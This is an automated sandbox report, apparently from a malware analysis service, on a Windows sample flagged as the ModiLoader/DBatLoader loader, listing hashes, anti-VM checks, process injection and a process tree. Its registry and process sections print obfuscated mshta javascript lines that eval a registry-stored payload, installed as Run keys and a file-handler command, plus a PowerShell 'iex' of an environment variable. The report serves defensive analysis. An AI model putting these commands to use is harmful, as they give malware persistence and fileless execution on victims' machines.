Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-09-2024 15:38
Static task
static1
Behavioral task
behavioral1
Sample
72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe
Resource
win10v2004-20240802-en
General
-
Target
72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe
-
Size
303KB
-
MD5
e365f643cb0ef6666351c0b791d63bb0
-
SHA1
9c6d363bd71f2bbdea5e5f54fadfd5b2fad6eb5d
-
SHA256
72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59d
-
SHA512
56e9fb13f0518730b1350b3cec6f31bd5a0b0833628e87bb1025659fcdc5e1c5c8b90af8edbc9bb21752f3b357e88a7bc8456f00abcbd1afe96f4364fbd53ab7
-
SSDEEP
6144:aSe2ihx5KEXUr6j9JQHOXEemcgkY3HU1dowtlo2yCUta0mcokLU:Jihwr82lemc/8HElgNRLU
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2740 2576 mshta.exe 31 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
description ioc Process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 64 IoCs
resource yara_rule behavioral1/memory/2720-0-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2720-2-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2720-3-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2720-8-0x00000000009A0000-0x0000000000A76000-memory.dmp modiloader_stage2 behavioral1/memory/2720-5-0x00000000009A0000-0x0000000000A76000-memory.dmp modiloader_stage2 behavioral1/memory/2720-7-0x00000000009A0000-0x0000000000A76000-memory.dmp modiloader_stage2 behavioral1/memory/2720-10-0x00000000009A0000-0x0000000000A76000-memory.dmp modiloader_stage2 behavioral1/memory/2720-9-0x00000000009A0000-0x0000000000A76000-memory.dmp modiloader_stage2 behavioral1/memory/2720-6-0x00000000009A0000-0x0000000000A76000-memory.dmp modiloader_stage2 behavioral1/memory/2720-4-0x00000000009A0000-0x0000000000A76000-memory.dmp modiloader_stage2 behavioral1/memory/2720-11-0x00000000009A0000-0x0000000000A76000-memory.dmp modiloader_stage2 behavioral1/memory/2720-14-0x00000000009A0000-0x0000000000A76000-memory.dmp modiloader_stage2 behavioral1/memory/2616-18-0x0000000005C90000-0x0000000005D66000-memory.dmp modiloader_stage2 behavioral1/memory/1548-20-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-19-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/2616-22-0x0000000005C90000-0x0000000005D66000-memory.dmp modiloader_stage2 behavioral1/memory/1548-30-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-29-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-28-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-27-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-26-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-25-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-24-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-23-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-31-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-38-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-37-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-36-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-35-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-34-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-33-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-32-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-54-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/2616-21-0x00000000027F0000-0x00000000047F0000-memory.dmp modiloader_stage2 behavioral1/memory/1548-62-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-53-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-52-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-51-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-50-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-45-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-61-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-44-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-43-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-42-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-41-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-40-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-39-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/1548-71-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/2176-73-0x0000000000130000-0x0000000000271000-memory.dmp modiloader_stage2 behavioral1/memory/2176-86-0x0000000000130000-0x0000000000271000-memory.dmp modiloader_stage2 behavioral1/memory/2176-84-0x0000000000130000-0x0000000000271000-memory.dmp modiloader_stage2 behavioral1/memory/1548-85-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/2176-82-0x0000000000130000-0x0000000000271000-memory.dmp modiloader_stage2 behavioral1/memory/1548-83-0x00000000000D0000-0x0000000000211000-memory.dmp modiloader_stage2 behavioral1/memory/2176-81-0x0000000000130000-0x0000000000271000-memory.dmp modiloader_stage2 behavioral1/memory/2176-80-0x0000000000130000-0x0000000000271000-memory.dmp modiloader_stage2 behavioral1/memory/2176-79-0x0000000000130000-0x0000000000271000-memory.dmp modiloader_stage2 behavioral1/memory/2176-78-0x0000000000130000-0x0000000000271000-memory.dmp modiloader_stage2 behavioral1/memory/2176-77-0x0000000000130000-0x0000000000271000-memory.dmp modiloader_stage2 behavioral1/memory/2176-75-0x0000000000130000-0x0000000000271000-memory.dmp modiloader_stage2 behavioral1/memory/2176-74-0x0000000000130000-0x0000000000271000-memory.dmp modiloader_stage2 behavioral1/memory/2176-72-0x0000000000130000-0x0000000000271000-memory.dmp modiloader_stage2 behavioral1/memory/2720-105-0x00000000009A0000-0x0000000000A76000-memory.dmp modiloader_stage2 behavioral1/memory/2176-76-0x0000000000130000-0x0000000000271000-memory.dmp modiloader_stage2 -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
pid Process 1548 regsvr32.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ed5072.lnk regsvr32.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:GvuZHI9=\"sv\";et67=new%20ActiveXObject(\"WScript.Shell\");dX5Hju=\"3\";u3g2Cw=et67.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\iuvjdch\\\\azua\");hDstz2W1=\"WzWSa\";eval(u3g2Cw);AUD5vU=\"YgbFsE\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:nmp0iLUq6=\"ovpXU\";ns51=new%20ActiveXObject(\"WScript.Shell\");cWWmF2Ai=\"GHVD3o\";C9BFZ4=ns51.RegRead(\"HKCU\\\\software\\\\iuvjdch\\\\azua\");zDF9BY=\"y\";eval(C9BFZ4);kyPdHW94=\"Y7el8\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\3d1107\\facfe4.lnk\"" regsvr32.exe -
pid Process 2616 powershell.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1056 set thread context of 2720 1056 72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe 30 PID 2616 set thread context of 1548 2616 powershell.exe 35 PID 1548 set thread context of 2176 1548 regsvr32.exe 36 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\243aec\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\243aec\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:YDu3N2=\"4qgAJRn\";wX9=new ActiveXObject(\"WScript.Shell\");a5qJc=\"SbzFTlj\";bkV1k2=wX9.RegRead(\"HKCU\\\\software\\\\iuvjdch\\\\azua\");vtyh3T=\"cCFW7\";eval(bkV1k2);HDgvd2y1=\"Vmhtu\";\"" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\.675646c regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\.675646c\ = "243aec" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\243aec regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\243aec\shell regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\243aec\shell\open regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2616 powershell.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe 1548 regsvr32.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2616 powershell.exe 1548 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2616 powershell.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 1056 wrote to memory of 2720 1056 72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe 30 PID 1056 wrote to memory of 2720 1056 72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe 30 PID 1056 wrote to memory of 2720 1056 72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe 30 PID 1056 wrote to memory of 2720 1056 72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe 30 PID 1056 wrote to memory of 2720 1056 72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe 30 PID 1056 wrote to memory of 2720 1056 72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe 30 PID 1056 wrote to memory of 2720 1056 72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe 30 PID 1056 wrote to memory of 2720 1056 72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe 30 PID 1056 wrote to memory of 2720 1056 72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe 30 PID 1056 wrote to memory of 2720 1056 72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe 30 PID 1056 wrote to memory of 2720 1056 72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe 30 PID 2740 wrote to memory of 2616 2740 mshta.exe 33 PID 2740 wrote to memory of 2616 2740 mshta.exe 33 PID 2740 wrote to memory of 2616 2740 mshta.exe 33 PID 2740 wrote to memory of 2616 2740 mshta.exe 33 PID 2616 wrote to memory of 1548 2616 powershell.exe 35 PID 2616 wrote to memory of 1548 2616 powershell.exe 35 PID 2616 wrote to memory of 1548 2616 powershell.exe 35 PID 2616 wrote to memory of 1548 2616 powershell.exe 35 PID 2616 wrote to memory of 1548 2616 powershell.exe 35 PID 2616 wrote to memory of 1548 2616 powershell.exe 35 PID 2616 wrote to memory of 1548 2616 powershell.exe 35 PID 2616 wrote to memory of 1548 2616 powershell.exe 35 PID 1548 wrote to memory of 2176 1548 regsvr32.exe 36 PID 1548 wrote to memory of 2176 1548 regsvr32.exe 36 PID 1548 wrote to memory of 2176 1548 regsvr32.exe 36 PID 1548 wrote to memory of 2176 1548 regsvr32.exe 36 PID 1548 wrote to memory of 2176 1548 regsvr32.exe 36 PID 1548 wrote to memory of 2176 1548 regsvr32.exe 36 PID 1548 wrote to memory of 2176 1548 regsvr32.exe 36 PID 1548 wrote to memory of 2176 1548 regsvr32.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe"C:\Users\Admin\AppData\Local\Temp\72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Users\Admin\AppData\Local\Temp\72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe"C:\Users\Admin\AppData\Local\Temp\72dec13f3b56fc87616af8ddc876f3ba24c78633f8fd429528922f66e5b8a59dN.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:Me5ixHa3y="qi69j";zt86=new%20ActiveXObject("WScript.Shell");m6ocTOs="3RtW";f4c1YE=zt86.RegRead("HKLM\\software\\Wow6432Node\\GU4ZXPm9h\\PSnYif");Bl5TI="yv8J";eval(f4c1YE);Hs7TBCaW="jsj3";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:gcackcl2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2176
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
40KB
MD5bfb54d9aed90e48dc62a956df7a215e6
SHA19729c10718a3b7670f16200f5bed9ab7e7ed4a8e
SHA256dd0577057da26442db1ee73a4b13a407c86847496e796922a2f5e6708f10d47e
SHA51258a1f9a13c3e0a5cc2f2d4c55e62e74ba84586d095b189149b18d4b7f781d69af0d6a08413589e24406dab021c51e60f887a8017727e584303b9bc5dfcaaba07
-
Filesize
61B
MD520320415e009645e0dcfded4c89db6b9
SHA1dbb8129e3372a017a3a2127c635c60adc55d4c7e
SHA256645398440d7d9e6edabf36abea5e3b6516d2c44fd3142e3d891688c9667a68ce
SHA51256d09838921ca1fc8ee4fabff38b4ff86549a24451c73ad39759c8cd26f4eedec313a902625a53cee4e35240fc36ab33a159c87e1d75ad712ad301f6840be4db
-
Filesize
877B
MD56c978a06f2ca304f49a77e9f0962679c
SHA10bcb7ec802755a00802e26061a7b0a098d536890
SHA256de31e8d72ea3686920485cade72a6910fe156b5dd20887ed681c5e0e8f6328e5
SHA512377045a514d7fc265d795af97be79def433f71bc050662602b0ad4cb06f9fdcbff0373b420e32b271c9fc9e97b1aff4df21fd2bf912dc00dbf97b1fdefe987f7
-
Filesize
987B
MD570cccb805192e5a3c3465a188abf6380
SHA11ed5fe548a609784ba76e7d25bfad25b54355669
SHA2561879bd3540448733980ff3c2b9b7f19a41e1bd3fa3d576c240be895c28b1f0fa
SHA512bc9fd1222845ec19dfbada411ed2389eaec23a9bdeb2ad6a6b1548eb6fef96c1d50236a66e1167b3e8a610eb55ccc4d7fdf7c4cd320ccf97bb52fb5e1861ad73
-
Filesize
11KB
MD5df91d750c9599e5e791ff071932ffb9b
SHA1f6e2dc78bb92fa1ea741702d36861eb454a693fc
SHA25689f3fc3fdc55a207427d1784b142330dd6859318ab47b0abc3f49b80521cd024
SHA5120e0e440bd156a73308a35f238d308aa85c4483c2162a78fd687d6401aa4248954811a2ea61a7a5e96f026d3448ab56731c0d491031825c580eec606c3de53601